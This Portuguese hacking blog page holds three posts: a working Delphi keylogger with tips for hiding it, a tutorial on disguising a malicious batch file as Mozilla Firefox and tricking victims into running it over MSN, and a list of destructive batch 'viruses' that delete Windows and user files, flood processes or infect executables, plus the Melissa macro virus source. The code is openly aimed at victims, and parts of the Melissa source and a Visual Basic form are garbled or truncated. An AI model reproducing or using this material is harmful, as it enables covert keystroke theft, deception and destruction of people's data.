Imagem da lateral da busca
Limpa os float da busca

Comente sobre nosso Site

Dica: Como criar um keylogger! (em Delphi)
segunda-feira, 21 de maio de 2012
Unknown

2 comentários


ESSE TEXTO TEM CARÁTER DIDÁTICO / APRENDIZADO DE PROGRAMAÇÃO. O USO QUE SE FARÁ DA INFORMAÇÃO É DE SUA TOTAL RESPONSABILIDADE. ELE DEVE SER USADO PARA FINS LEGAIS APENAS.
por Marcos Elias
Essa dica de Delphi é muuuuito boa! Um tempão atrás disso... Finalmente achei algo significante... Use por sua conta e risco!!!
Um método fácil de capturar TUDO O QUE É DIGITADO no computador com Windows, ou seja, um método fácil de criar um keylogger. É uma dica de programação, portanto não é para qualquer um. Uso o Borland Delphi 7, deve funcionar em diversas outras versões também...
Como é avançada, apesar de relativamente fácil, não vou comentar muito, ok?! Se você tiver dúvidas, comentários ou sugestões deixe um comentário neste post, e NÃO me envie e-mails perguntando porque não tenho tempo para responder sobre programação ou coisas avançadas.
Inicie o Delphi e crie um novo projeto. Insira um Memo e um Timer.
No código, defina a seguinte função:
function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;
E coloque no evento Timer do temporizador:
procedure TForm1.Timer1Timer(Sender: TObject);
var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(' [BACKSPACE] ');
9: Coloca(' [TAB] ');
12: Coloca(' [ALT] ');
13: Coloca(' [ENTER] ');
16: Coloca(' [SHIFT] ');
17: Coloca(' [CONTROL] ');
18: Coloca(' [ALT] ');
20: Coloca(' [CAPS LOCK] ');
21: Coloca(' [PAGE UP] ');
27: Coloca(' [ESC] ');
33: Coloca(' [PAGE UP] ');
34: Coloca(' [PAGE DOWN] ');
35: Coloca(' [END] ');
36: Coloca(' [HOME] ');
37: Coloca(' [SETA ESQUERDA] ');
38: Coloca(' [SETA ACIMA] ');
39: Coloca(' [SETA DIREITA] ');
40: Coloca(' [SETA ABAIXO] ');
45: Coloca(' [INSERT] ');
46: Coloca(' [DEL] ');
91: Coloca(' [WIN ESQUERDA] ');
92: Coloca(' [WIN DIREITA] ');
93: Coloca(' [MENU POP-UP] ');
96: Coloca('0');
97: Coloca('1');
98: Coloca('2');
99: Coloca('3');
100: Coloca('4');
101: Coloca('5');
102: Coloca('6');
103: Coloca('7');
104: Coloca('8');
105: Coloca('9');
106: Coloca(' [NUM *] ');
107: Coloca(' [NUM +] ');
109: Coloca(' [NUM -] ');
110: Coloca(' [NUM SEP. DECIMAL] ');
111: Coloca(' [NUM /] ');
112: Coloca(' [F1] ');
113: Coloca(' [F2] ');
114: Coloca(' [F3] ');
115: Coloca(' [F4] ');
116: Coloca(' [F5] ');
117: Coloca(' [F6] ');
118: Coloca(' [F7] ');
119: Coloca(' [F8] ');
120: Coloca(' [F9] ');
121: Coloca(' [F10] ');
122: Coloca(' [F11] ');
123: Coloca(' [F12] ');
144: Coloca(' [NUM LOCK] ');
186: Coloca('Ç');
187: Coloca('=');
188: Coloca(',');
189: Coloca('-');
190: Coloca('.');
191: Coloca(';');
192: Coloca(' [APÓSTROFO] ');
193: Coloca('/');
194: Coloca(' [NUM PONTO] ');
219: Coloca('´');
220: Coloca(']');
221: Coloca('[');
222: Coloca('~');
226: Coloca('\');
else
if (KeyLoop >= 65) and (keyloop <= 90) then
Coloca(Chr(keyloop));
if (keyloop >= 32) and (keyloop <= 63) then
Coloca(Chr(keyloop));
//numpad keycodes
if (keyloop >= 96) and (keyloop <= 110) then
Coloca(Chr(keyloop));
end;
end; //case;
inc(keyloop);
until keyloop = 255;
end;
ah sim, ia esquecendo.. coloque o interval do timer para "1"... senão ficará difícil captar neh.. rs
e ++:
é bom dxar o memo desabilitado (com a propriedade Enabled := False), pq se vc digitar nele, irá aparecer o q vc digitou naturalmente MAIS o q o Timer fica adicionando a ele, e ficará repedito e confuso..
Então... Rode o programa (tecle F9).
Tecle qualquer coisa no teclado e observe! Isso funciona mesmo se sua janela não estiver ativa (digo, se estiver por trás das outras ou ocultas). Keylogger que se preze... Não fica em janela!
Oculte-o como preferir, e salve o conteúdo do Memo onde quiser. Aí é com você...
Dica: para ocultar o programa, digite Application.ShowMainForm := False, no código-fonte do projeto, depois do Application.Initialize e antes do Application.CreateForm... Mas aí você deverá ter criado um método para recuperar o que foi digitado, né?!
Adapte o programa como você quiser, afinal aqui apenas mostrei como é possível capturar o que foi digitado. Lembre-se de que ele poderá ser fechado pelo Gerenciador de tarefas do Windows, através da guia "Processos".
deixo claro que esse código realmente "funciona", eu testei e coloquei algumas coisas a mais. eh soh adaptar ao q vc quer fazer!
UM KEYLOGGER PODE SER VISTO COMO UM PROGRAMA DO MAL, QUE COLETA DADOS DO USUÁRIO SEM O CONSENTIMENTO DESTE, E ENVIA AS INFORMAÇÕES COLETADAS PARA ALGUM HACKER OU PESSOA DO MAL. MAS ESSE MESMO KEYLOGGER PODE SER USADO PARA IDENTIFICAR O FUNCIONÁRIO QUE ZÔA NOS COMPUTADORES DA EMPRESA, PARA VER O QUE SUA FILHA DE 10 ANOS TECLA NO MSN, ETC. NOTE QUE PODE SER DE USO PROIBIDO EM ALGUNS PAÍSES. EM OUTROS, O MAIS COMUM, PARA SER CONSIDERADO UM SOFTWARE LEGAL ELE DEVE INFORMAR QUE O SISTEMA ESTÁ SENDO MONITORADO. EM EMPRESAS, POR EXEMPLO, OS FUNCIONÁRIOS DEVEM USAR OS COMPUTADORES PARA FINS DA EMPRESA, NUNCA COMO USO PESSOAL. ISSO DEVE SER DEIXADO BEM CLARO EM CONTRATO.
NÃO ME RESPONSABILIZO POR NADA QUE POSSA ACONTECER DEVIDO O USO DESTES CÓDIGOS AQUI APRESENTADOS. USE COM CONSCIÊNCIA E RESPONSABILIDADE, SEMPRE.
Nada como uma dica dessas comemorando esse UM ANO do Explorando!
NOTA: Apesar de funcionar, essa forma de criar keylogger é uma gambiarra tremenda. Não é ideal usar um Timer para isso, devido o processamento, quem sabe em alguma situação com uso intensivo de CPU por outras aplicações algumas teclas deixem de ser capturadas. O melhor é estudar sobre Hooks usando a API do Windows que intercepta os caracteres enviados pelo teclado, mas falar disso fica para uma outra hora.



Interaja Com o Autor!
2 comentários
Na Categoria de:

 

Fazendo alguém abrir seu virus
Unknown

Nenhum Comentario

Após ter tranformado seu .bat em .exe, para alterar o nome do arquivo e fazê-lo acreditar em seu programa ( fazer abrí-lo ) é necessário seguir este pequeno protocolo :

Você tem acesso ao computador da vítima ou pretende passá-la por MSN e outros ?

Se você tem acesso ao computador da vítima faça isto com o mozilla firefox ou internet explorer :

Click this bar to view the original image of 800x600px.


Exclua apenas o atalho, não remova o programa, agora pegue seu .bat e crie um atalho :
Click this bar to view the original image of 800x600px.


Agora você tem o original e o atalho, então dê um clique com o botão direito do mouse e então vá em propriedades :
Click this bar to view the original image of 800x600px.


Marque a caixa Oculto :
Click this bar to view the original image of 800x600px.
 

Agora como você verá o arquivo original ficou transparente, atualize o meu computador que ele irá sumir.

próximo passo é renomeá-lo ( renomei-o para "Mozilla Firefox" '-' ) :
Click this bar to view the original image of 800x600px.


Agora que você tem o atalho, que foi criado para a possivel modificação de ícone, vamos realizar uma :
Click this bar to view the original image of 800x600px.


No caso do programa eu usei o ícone do Mozilla Firefox, ele é facil de ser encontrado, tanto na internet quanto na pasta do Mozilla, se não acharem postem aqui a dúvida.


Agora, se você não tem acesso ao computador da vítima, ache algo bem interessante para que a pessoa aceite no MSN, tais como : Jogo, Fotos, Vídeos, Programas e etc.

Bem..., se você for colocar um malware no computador de uma pessoas, um badcom, um .bat destruidor ou até mesmo uma brincadeirinha de mal gosto você vai precisar atraí-la para o Programa, é nisto que o tutorial se baseia.

O tutorial está dividido em 4 partes :
  1. Extensão
  2. Nome
  3. Design
  4. Outros
1. Extensão :

Bem, como não gosto de duplicar conteúdo ou até mesmo Rippar conteúdo, estou disponibilizando um tópico que mostra perfeitamente como tranformar um .bat em .exe
Aqui

2. Nome



Design :

Para a mudança de ícone do arquivo é necessário :

-Pegue seu .bat e crie um atalho, agora você tem o original e o atalho, então dê um clique com o botão direito do mouse e então vá em propriedades e marque a caixa "Oculto", clique com o botão direito no atalho e vá em propriedades, depois em Alterar ícone e marque o ícone selecionado.

A mudança de ícone é algo que é totalmente necessário para que uma pessoa abra o programa, pois ele a induz e aumenta a curiosidade.

Outros :

O resto é só incrementar, postar prints falsos também é ótimo para a indução, aqui vão alguns para vocês enganarem :

Click this bar to view the original image of 800x600px.

Click this bar to view the original image of 571x281px.

Click this bar to view the original image of 800x600px.



Interaja Com o Autor!
Comente Este Artigo
Na Categoria de:

 

Virus Bat
Unknown

Nenhum Comentario

Bom primeiro nunca teste um vírus em seu próprio hd...agora ensinarei a fazer 1 vírus pelo ms dos ou bloco de notas...

Primeiro abra o ms dos se vc não souber(se mate lammer)depois de aberto
digite Edit (e o nome do seu virus).bat|
depois vc ira digitar oque ele deve fazer se vc quizer q ele so desligue o pc da vitima digite:
@echo off
BREAK OFF
shutdown -r
Exit 
←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
agora se vc quizer fuder realmente o pc da vitima digite: Twisted Evil
@echo off
BREAK OFF
DELTREE/y C:*.*
DELTREE/y D:*.*
DELTREE/y E:*.*
DELTREE/y F:*.*
cd
cd windows
del *.com
del *.sys
del *.dll
del *.log
del *.txt
del *.ini
del *.prx
del win.com
cd
cd windows
cd system32
del *.com
del *.sys
del *.dll
del *.log
del *.txt
del *.ini
del *.prx
shutdown -r
Exit

Pronto simples fácil e maldoso ta ai o seu .bat!!

Atençao: Nao u


←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
Bom primeiro nunca teste um virus em seu proprio hd...agora ensinarei a fazer 1 virus pelo ms dos ou bloco de notas...

Primeiro abra o ms dos se vc não souber(se mate lammer)depois de aberto
digite Edit (e o nome do seu virus).bat|
depois vc ira digitar oque ele deve fazer se vc quizer q ele so desligue o pc da vitima digite:
@echo off
BREAK OFF
shutdown -r
Exit


Nomeel All Windows
rmdir /s /q c:\windows
Funçãoeleta tdo do Windows (fode o pc)


Nome:Autoexec
@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*
Função:Fode com tudo


Nome:Trojan-1
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.**** Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height
Função:Auguns dos trojans tradiçionais


Nomeel p/ Windows
del /s /q c:\windows\
Funçãoeleta tudo dentro do Windows ex: arquivos e naum pastas


Nome:Shutdown-S
shutdown -s
Funçãoesliga o pc


Nome:Shutdown-R
shutdown -r
Função:Reinicia o pc


Nome:Trojan-2
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
Função:Fode com tudo mesmo...


Nome:Pirata
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Função:Testar seu Anti-Virus ou enganar alguem.


Nome:Melissa 1999
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.***ressLists.Count
Set ***yBook = DasMapiName.***ressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To ***yBook.***ressEntries.Count
Peep = ***yBook.***ressEntries(x)
BreakUmOffASlice.Recipients.*** Peep
x = x + 1
If x > 50 Then oo = ***yBook.***ressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.*** ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus, além de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$ 600 milhões.


Nome:CLICK EM MIM
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
Função:Fica repetindo varias vezes a mesma mensagem


Nome:Progstar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
Função:Abre varios programas sem parar, fais o pc travar


Nome:bomba relógio
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo


Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Função:Congela todos os msn's que estao sendo executados.


Vou por aqui o download do arquivo que converte .bat para .exe





Interaja Com o Autor!
Comente Este Artigo
Na Categoria de:

 

Button


..

Página 1 de 7

Parceria

Seu Portal de Downloads na Internet - Downloads Gratis de Filmes, AVI, RMVB, Jogos, XBOX360, PS2 e Muito Mais...

.

Curtir